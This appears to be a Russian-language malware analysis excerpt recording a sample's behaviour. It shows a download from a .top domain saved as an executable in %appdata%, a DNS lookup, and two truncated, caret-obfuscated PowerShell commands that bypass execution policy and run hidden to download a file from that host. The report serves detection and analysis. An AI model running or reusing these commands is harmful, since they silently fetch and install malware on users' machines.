Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^erS^HEll.^EXe -E^xEcU^tI^onpolic^y ^bYP^aS^s -n^oProfiLe^ -WiNDowS^TY^L^e ^HiDDEN^ ^(^N^EW-OBJECT ^s^YsT^em^.^nET.^wEBC^L^I^e^n^T).^downloaDf^IlE(^'http://www.fapoe...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "pow^erS^HEll.^EXe -E^xEcU^tI^onpolic^y ^bYP^aS^s -n^oProfiLe^ -WiNDowS^TY^L^e ^HiDDEN^ ^(^N^EW-OBJECT ^s^YsT^em^.^nET.^wEBC^L^I^e^n^T).^downloaDf^IlE(^'http://www.fapoe...' (со скрытым окном)